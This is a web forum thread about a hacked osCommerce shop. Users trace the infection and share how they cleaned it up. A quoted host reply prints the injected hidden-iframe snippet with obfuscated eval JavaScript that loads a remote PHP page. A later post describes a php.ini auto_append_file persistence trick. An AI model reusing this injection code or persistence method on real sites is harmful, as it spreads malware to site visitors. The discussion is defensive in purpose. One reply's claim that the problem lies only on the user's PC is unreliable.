My ecommerce site has been hacked

[luxurycandles]

Hi,

 

I am running my site from OSC v2.2 release. When I loaded the site, Windows alerted my of a trojan called Artemis!4D940ABB21EC.

 

Having done some initial spot checks it's not apparent from the code or the database, all appears ok.

 

I then contacted my host providers and get the following reply

 

------------------------------------------------------------------------------------------------------------------------------------

Hi,

 

Seems some code has been added

 

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7474" height="1" width="1"><img src="about:blank" onError='astro=unescape("%27");astru=unescape("%22");sksa=eval("document.getElementById("+astro+"seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"+astro+")+document.getElementById("+astro+"7474"+astro+").id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"1289234763"+astro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.getElementById("seaid").src=sksa' style="width:300;height:300;border:0px;"><iframe id="seaid" src="about:blank"></iframe></div>

 

It tried to take me to http://7474.in/1289234763.php

 

So you will need to check and remove that code from your template.

--------------------------------------------------------------------------------------------------------------------------------------

 

I then look in the code and database again for anything that looks or may seem to inject the div code, but it's not so clear. I am currently running a beyond compare between the current live site and the latest copy of the site I have taken.

 

I would be most grateful if anyone can assist on this matter. I have also been having a look through the forums for any guidance.

 

Thanks in advance!

[Guest]

Read the security forum on how to secure your site and the admin area. Look for anomalous files and malicious code. The most common hacked files are index.php, application_top.php, header.php and configure.php

 

While you are trying to clean your site, I suggest password protecting the entire site so potential customers don't accidentally receive the virus your site is spreading.

 

 

 

Chris

[luxurycandles]

Hi Chris,

 

Thank you for getting in touch and your advice... Here's what I found!

 

Having gone through the code and compared with the original source code, I found the following line had been added at the end of the header.asp.

 

<?php eval(base64_decode("-----CODE----------------?>

 

It uses a php function base64_decode to decode the huge chain of characters. Having googled for an online 64 bit decoder, I was able to decode the above which produces the following...

 

function s37($s)-----------CODE ------(hctam_gerp((fi'))

 

When I was in touch with my web host provider earlier, they initially pointed out there was code (below) being generated and potentially injected into the site and the following was most likely generated by the above function...

 

 

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7474"------ CODE ------</iframe></div>

 

It tried to take me to http://7474.in/1289234763.php

 

 

Thanks for pointing me in the right direction!

 

Kind Regards,

 

Tajinder

[kandles]

I had the same problem. Removed the injected code from header.php and works OK now.

 

Now time to learn more about security!

[lxanth]

Hi all, I have a similar but more complicated case.

 

All my pages, both catalog and admin are injected with the code on the first post of this thread. Problem is I cannot find it anywhere in the code. Tried grep with "eval(base64_decode" on the code and the database but nothing is found. I also checked .htaccess files and they are just fine.

But here's the strange befaviour.

I have a RedHat enterprise server with plesk with different domains. Two of my domains have oscommerce installed. Only one of them is infected.

- When I make a new installation of oscommerce 2.3.1 (with a new clean database) on the infected domain, the new installation is infected.

- When I make a new installation of oscommerce 2.3.1 (with a new clean database) on a second (another) virtual domain, the new installation is infected !?!!

- When I make a new installation of oscommerce 2.3.1 on a third domain I already have installed oscommerce 2.2, the new installation is clean (not infected). I of course installed in another directory.

 

As I have also noticed that the injected code appears at random and not always, I would say that probably the server is infected and not just the installation of oscommerce.

 

I'd appreciate any clues you could provide with.

[littlephoenix]

The Generic!Artemis virus is a relatively new virus which spread i think in 2008 or so, and has been assessed to be a low threat virus.

If you have this virus, its most likely in your PC and not on the server side of your oscommerce, so download Malwarebytes and run it on your system, this shoould find the virus and delete it.

[alperal]

Finally, I found the damn script !!!

 

I've been fighting with the same malware code for almost 10 days now. The code is hidden in the /tmp directoy, and it manages de execute depending on URL conditions. That's why it's been so hard to find or reproduce.

 

It's not a specifically a problem of OsCommerce neither Wordpress or Joomla.

 

The installations get infected inside the images directory, which most of users leave wide open (drwxrwxrwx). This malware affects to a complete hosting server (all hosting users / pages) are affected, since php.ini file is modified by the hackers:

 

auto_append_file=/tmp/ssl.php

error_reporting=0

 

They auto append the malware script to all php scripts, but it executes depending on the URL form. And they also deactivate error reporting, so you can not see any problems in the log files.

 

Don't forget to clean all malware code from your images directory. There is a ";.php" file sometimes in the dir. also a lot of google*.php files or goog1*.php files.

 

I hope this help. Be free !

 

God bless you all !